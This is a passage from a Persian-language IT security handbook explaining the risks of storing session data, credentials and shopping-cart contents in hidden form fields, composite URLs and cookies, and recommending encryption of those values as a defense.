‫ﮔﺰﻳﻨﻪﻫﺎﻱ ﻫﻤﺎﻥ ﻓﻬﺮﺳﺖ ﺍﺳﺖ‪ .‬ﻣﻬﺎﺟﻤﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﻣﻘﺪﺍﺭ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻭﺭﻭﺩﻱ ﺍﻳﻦ ﻓﻬﺮﺳـﺘﻬﺎ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ‬
‫ﺑﻔﺮﺳﺘﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﻬﻴﭽﻮﺟﻪ ﺧﻮﺩ ﺭﺍ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﻘﺎﺩﻳﺮ ﻣﺠﺎﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﺍﻧﺘﺨﺎﺑﻲ ﻧﻤﻲﻛﻨﻨﺪ‪.‬‬
‫ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻓﺮﻣﻬﺎﻱ ﺷﻤﺎ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺻﺤﺖ ﻣﺤﺘﻮﻳﺎﺕ ﺧﻮﺩ ﺍﺯ ‪ JavaScript‬ﺳﻤﺖ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ‪،‬‬ ‫•‬
‫ﺑﺎﺯﻫﻢ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺩﺭ ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻧﻴﺰ ﻣﺤﺘﻮﻳﺎﺕ ﻓﺮﻣﻬﺎ ﻣﺠﺪﺩﹰﺍ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ‪ .‬ﻣﻬﺎﺟﻤـﺎﻥ ﺑـﺴﺎﺩﮔﻲ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻳﻦ ﺳﺪﻫﺎﻱ ﻛﻨﺘﺮﻟﻲ ﺑﮕﺬﺭﻧﺪ ﻭ ﻳﺎ ﺑﻄﻮﺭ ﻛﻠﻲ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻨﺪ‪.‬‬

‫ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﻭ ‪URL‬ﻫﺎﻱ ﺗﺮﻛﻴﺒﻲ‬


‫ﻳﻚ ﻓﻴﻠﺪ ﻣﺨﻔﻲ‪ ٢٣١‬ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻓﻴﻠﺪﻱ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﻣﻲﻓﺮﺳﺘﺪ‪ ،‬ﺍﻣﺎ ﺭﻭﻱ ﺻﻔﺤﻪﻧﻤﺎﻳﺶ ﻛﺎﺭﺑﺮ ﻇﺎﻫﺮ ﻧﻤﻲﺷـﻮﺩ؛‬
‫ﻭ ﺩﺭﻋﻮﺽ ﺩﺭ ﺣﺎﻓﻈﺔ ﻣﺮﻭﺭﮔﺮ ﺟﺎ ﻣﻲﮔﻴﺮﺩ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻓﺮﻡ ﺑﻪ ﺳﻮﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﺯﭘﺲ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪ‪ ،‬ﻓﻴﻠـﺪ ﻣﺮﺑﻮﻃـﻪ ﻭ ﻣﺤﺘﻮﻳـﺎﺕ ﺁﻥ‬
‫ﻧﻴﺰ ﺑﺎﺯﭘﺲ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﻧﺪ‪.‬‬

‫‪227 Internet Security Systems‬‬


‫‪ ISS ۲۲۸‬ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﺩﺳﺎﻣﺒﺮ ‪ ۱۹۹۹‬ﮔﺰﺍﺭﺵ ﻛﺮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺭﺍ ﺩﺭ ﻓﻮﺭﻳﺔ ‪ ۲۰۰۰‬ﺩﺭ ﻣﻄﺒﻮﻋﺎﺕ ﻣﻨﺘﺸﺮ ﻧﻤﻮﺩ‪ .‬ﺑـﺮﺍﻱ ﻛـﺴﺐ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺍﻳﻦ ﺁﺩﺭﺱ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ‪:‬‬
‫‪http://www.cnn.com/2000/TECH/computing/02/04/shop.glitch.idg/‬‬
‫‪ ۲۲۹‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ "ﺑﺎﻳﺪﻫﺎ ﻭ ﻧﺒﺎﻳﺪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﻭﻱ ﻭﺏ"‪ ،‬ﮔﺰﺍﺭﺵ ﻓﻨﻲ ﺷﻤﺎﺭﺓ ‪ USENIX ۸۱۸‬ﻭ ‪ ،MIT‬ﺗﻬﻴﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ‬
‫‪ ،Kendra Smith ،Emil Sit ،Kevin Fu‬ﻭ ‪.Nick Feamster‬‬
‫‪230 Combo Box‬‬
‫‪231 Hidden Field‬‬
‫‪٣٦٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﺮﺧﻲ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻭﺏ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﺟﻠﺴﻪ )ﺗﺸﺨﻴﺺ ﻛـﺎﺭﺑﺮ( ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻼ ﺑﺠﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻭﻟﻴﺔ ‪ ،HTTP‬ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺑﻌﻀﹰﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﻓﺮﻣﻬﺎﻱ ﺑﻌﺪﻱ ﺩﺭ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪:‬‬
‫>”‪<INPUT TYPE=”hidden” NAME=”username” VALUE=”simsong‬‬
‫>”‪<INPUT TYPE=”hidden” NAME=”password” VALUE=”myauth11‬‬
‫ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪:‬‬
‫>”‪<INPUT TYPE=”hidden” NAME=”items” VALUE=”3‬‬
‫>”‪<INPUT TYPE=”hidden” NAME=”item1” VALUE=”Book of Secrets:$4.99‬‬
‫>”‪<INPUT TYPE=”hidden” NAME=”item2” VALUE=”Nasty Software:$45.32‬‬
‫>”‪<INPUT TYPE=”hidden” NAME=”item3” VALUE=”Helping Hand:$32.23‬‬
‫ﺑﺠﺎﻱ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺩﺭ ‪ URL‬ﻗـﺮﺍﺭ ﺩﺍﺩ‪ .‬ﺍﻳـﻦ ‪URL‬ﻫـﺎ ﭘـﺲ ﺍﺯ ﺭﺳـﻴﺪﻥ ﺑـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﻫﻤﺎﻥ ﺻﻮﺭﺕ ﻗﺒﻠﻲ ﺗﻌﺒﻴﺮ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﻣﺸﺎﺑﻪ ﺣﺎﻟﺘﻲ ﻛﻪ ﺩﺭ ﻓﺮﻣﻬﺎﻱ ﺻﻔﺤﺎﺕ ﻭﺏ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻭ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜـﻞ‬
‫ﻼ ‪ URL‬ﺯﻳﺮ ﺣﺎﻭﻱ ﻫﻤﺎﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻗﺒﻠﻲ ﺍﺳﺖ‪:‬‬
‫‪ HTTP GET‬ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫‪http://www.vineyard.net/cgi-bin/password_tester?username=simsong&password=myauth11‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﺑﺴﻴﺎﺭ ﺁﺳﺎﻥ ﺍﺳﺖ‪ ،‬ﺑﻪ ﺍﺯﺍﻱ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﻧﺎﭼﻴﺰﻱ )ﻭ ﺷﺎﻳﺪ ﺣﺘﻲ ﻫﻴﭻ ﺍﻃﻼﻋـﺎﺗﻲ( ﺑﺎﻳـﺪ ﺩﺭ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ‬
‫ﺫﺧﻴﺮﻩ ﺷﻮﺩ؛ ﻭ ﺑﺮﺧﻼﻑ ‪cookie‬ﻫﺎ ﻛﻪ ﺑﻪ ‪ ۴۰۶۹‬ﺑﺎﻳﺖ ﻣﺤﺪﻭﺩ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﺩﺭ ﻋﻤﻞ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﺍﻧﺪﺍﺯﺓ ﺩﻟﺨﻮﺍﻫﻲ ﺩﺍﺷﺘﻪ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺍﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﺑﻪ ﺍﻳﻨﺼﻮﺭﺕ ﻣﺸﻜﻼﺗﻲ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﭘﻲ ﺩﺍﺭﺩ‪:‬‬
‫ﺍﮔﺮ ﻛﺎﺭﺑﺮ ﻛﻠﻴﺪ ‪ back‬ﺭﺍ ﻓﺸﺎﺭ ﺩﻫﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺟﻨﺎﺱ ﺍﺯ ﻛﺎﺭﺕ ﺧﺮﻳﺪ ﺣﺬﻑ ﺷﻮﻧﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﻭ‬ ‫•‬
‫ﻣﻔﻴﺪ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﻧﻴﺴﺖ‪.‬‬
‫ﻼ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻛـﻪ‬‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺻﻔﺤﺎﺕ ‪ HTML‬ﻛﻪ ﺗﻮﺳﻂ ﻳﻜﻨﻔﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‪ ،‬ﺑﻪ ﺭﺅﻳﺖ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﺑﺮﺳﺪ‪ ،‬ﻣﺜ ﹰ‬ ‫•‬
‫ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻳﺎﻧﻪ ﻣﻴﺎﻥ ﭼﻨﺪ ﻧﻔﺮ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺷـﺮﺍﻳﻂ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﺭﻣـﺰ ﻋﺒـﻮﺭ‪ ،‬ﻭ ﻳـﺎ‬
‫ﻣﺤﺘﻮﻳﺎﺕ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ ﻫﺮﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﺳﺎﻳﺮﻳﻦ ﺍﻓﺸﺎﺀ ﺷﻮﺩ‪.‬‬
‫ﺍﮔﺮ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻭ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ‪ URL‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ URL ،‬ﻛﺎﻣﻞ ‪ -‬ﻛﻪ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ ﺟﺎﺳـﺎﺯﻱﺷـﺪﻩ ﺍﺳـﺖ ‪ -‬ﺩﺭ‬ ‫•‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺫﺧﻴﺮﻩ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺩﻳﮕﺮ ﺩﺳـﺘﻴﺎﺑﻲ ﭘﻴـﺪﺍ ﻣـﻲﻛﻨـﺪ‪،‬‬
‫ﻣﺮﻭﺭﮔﺮ ﻣﻲﺗﻮﺍﻧﺪ ‪ URL‬ﻛﺎﻣﻞ ﺭﺍ ﺩﺭ ‪ header‬ﺍﺭﺟﺎﻉﺩﻫﻨﺪﺓ ]‪ [sic‬ﺑﻔﺮﺳﺘﺪ‪ ،‬ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻣﻨﻴﺖ ﻭ ﻳﺎ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻛﺎﺭﺑﺮ ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻛﻨﺪ‪.‬‬


‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ‪ ،‬ﻣﺤﺘﻮﻳﺎﺕ ﻓﻴﻠﺪ ﻣﺨﻔﻲ ﻛﻪ ﺗﻮﺳﻂ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪ ،‬ﺑﺎ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﻳﻜﺴﺎﻥ‬ ‫•‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺗﻀﻤﻴﻦ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺭﺩ‪ .‬ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺻﻔﺤﺔ ‪ HTML‬ﺷﻤﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻛﻨﺪ‪ ،‬ﻓﺮﻣﻬﺎﻱ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺗﺤﻠﻴﻞ ﻗـﺮﺍﺭ‬
‫ﺩﻫﺪ‪ ،‬ﻭ ﻓﺮﺍﻣﻴﻦ ‪ GET‬ﻭ ‪ POST‬ﻣﺨﺼﻮﺹ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻣﺤﺘﻮﻳﺎﺕ ﺩﻟﺨﻮﺍﻩ ﺻﺎﺩﺭ ﻛﻨﺪ‪ .‬ﻣﻬﺎﺟﻢ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺻـﻔﺤﺔ ﻭﺏ‬
‫ﺭﺍ ﺑﺎﺭﻫﺎ ﻭ ﺑﺎﺭﻫﺎ ﺑﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺟﺰﺋﻲ ﻭ ﺩﺭ ﺗﻼﺵ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺑﻪ ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻔﺮﺳﺘﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺭﺍﻫﻲ ﺑـﺮﺍﻱ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﭘﺲ ﭼﺎﺭﻩﺍﻱ ﺟﺰ ﺍﻳﺠﺎﺩ ﺍﻳﻤﻨﻲ ﺩﺭ ﺑﺮﺍﺑﺮ ﺁﻥ ﻧﻴﺴﺖ‪.‬‬
‫ﭼﻨﺎﻧﭽﻪ ﺍﺗﺼﺎﻝ ‪ HTTP‬ﺑﺎ ﭘﺮﻭﺗﻜﻞ ‪ SSL‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﺸﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺑـﺪﺯﺩﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫•‬
‫ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻧﻴﺰ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٦٨‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪cookie‬ﻫﺎ‬
‫ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﺟﺎﻟﺐ ﺑﺮﺍﻱ ﺍﻳﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﻭ ﻳﺎ ‪URL‬ﻫﺎ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﭼـﻮﻥ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﺭﻣـﺰ ﻋﺒـﻮﺭ‪،‬‬
‫ﻣﺤﺘﻮﻳﺎﺕ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ ﻭ ﭼﻴﺰﻫﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ‪ ،‬ﺩﺭ ‪cookie‬ﻫﺎﻱ ‪ HTTP‬ﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ‪.‬‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ‪cookie‬ﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺻﻼﺡ ﻛﻨﻨﺪ‪ ،‬ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ‪cookie‬ﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﻛﺎﺭﺑﺮ‪ ،‬ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ‪ ،‬ﻭ ﺳـﺎﻳﺮ ﺍﻧـﻮﺍﻉ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻧﻴﺰ ﺍﺯ ﻫﻤﺔ ﻣﺸﻜﻼﺕ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ ﻭ ﻳﺎ ‪URL‬ﻫﺎﻱ ﺗﺮﻛﻴﺒﻲ ﺭﻧﺞ ﻣـﻲﺑﺮﻧـﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﺍﻳﻦ‪cookie ،‬ﻫﺎ ﻣﺸﻜﻼﺕ ﺧﺎﺹ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﺩﺍﺭﻧﺪ‪:‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﺷﺮﺍﻳﻄﻲ ﺑﺘﻮﺍﻥ ‪cookie‬ﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺭﺍ ‪ -‬ﺣﺘﻲ ﭘﺲ ﺍﺯ ﺍﻧﻘﻀﺎﻱ ﺁﻧﻬﺎ ‪ -‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ؛‬ ‫•‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ‪cookie‬ﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺍﺯ ﻛﭙﻲﺷﺪﻥ ﺧﻮﺩ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺧﻮﺩﺩﺍﺭﻱ ﻛﻨﻨﺪ ﻧـﺴﺨﻪﻫـﺎﻱ ﺑﻠﻨﺪﻣـﺪﺕ‬ ‫•‬
‫ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ؛ ﻭ‬
‫ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ‪cookie‬ﻫﺎ ﺧﻮﺷﺒﻴﻦ ﻧﻴﺴﺘﻨﺪ ﻭ ﻛ ﹰ‬
‫ﻼ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﻛﻨﻨﺪ‪.‬‬ ‫•‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﻣﻘﺎﻭﻡﻛﺮﺩﻥ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ‪URL ،‬ﻫﺎﻱ ﻣﺮﻛﺐ‪ ،‬ﻭ ‪cookie‬ﻫﺎ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﮔﻔﺘﻪ ﺷﺪ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻓﻴﻠﺪﻫﺎﻱ ﻣﺨﻔﻲ‪URL ،‬ﻫﺎﻱ ﺗﺮﻛﻴﺒـﻲ‪ ،‬ﻭ ‪cookie‬ﻫـﺎ‬
‫ﺣﻞ ﻛﺮﺩ‪ .‬ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺭﻙ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ ،‬ﻭ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺟﺎﺯﻩ ﺩﻫﺪ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﻭ ﻳﺎ ﺗﺼﺎﺩﻓﻲ ﺩﺭ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻛﺸﻒ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻬﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﻗﺒﻠﻲ ﻛﻪ‬
‫ﺩﺭ ﺁﻧﻬﺎ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ‪:‬‬

‫”‪<INPUT TYPE=”hidden” NAME=”auth‬‬


‫‪VALUE=”p6e6J6FwQOk0tqLFTFYq5EXR03GQ1wYWG0ZsVnk09yv7ItIHG17ymls4UM%2F1bw‬‬
‫>”‪HygRhp7ECawzUm%0AKl3Q%2BKRYhlmGILFtbde8%0A:‬‬
‫ﻳﻚ ﻛﺎﺭﺕ ﺧﺮﻳﺪ ﺍﻳﻤﻦ‪:‬‬

‫”‪<INPUT TYPE=”hidden” NAME=”cart‬‬


‫‪VALUE=”fLkrNxpQ9GKv9%2FrAvnLhuLnNDAV50KhNPjPhqG6fMJoJ5kCQ5u1gh0ij8JBqphBxd‬‬
‫‪GVNOdja41XJ%0APLsT%2Bt1kydWN4Q%2BO9pW0yR9eIPLrzaDsZxauNPEe7cymPmXwd%‬‬
‫>”‪2B6c1L49uTwdNTKoS0XAThDzow%3D%3D%0A:‬‬
‫ﻳﻚ ‪ URL‬ﺗﺮﻛﻴﺒﻲ‪:‬‬

‫_‪http://www.vineyard.net/cgi-bin/password‬‬
‫‪tester?p6e6J6FwQOk0tqLFTFYq5EXR03GQ1wYWG0ZsVnk09yv7ItIHG17ymls4UM%2F1bwHy‬‬
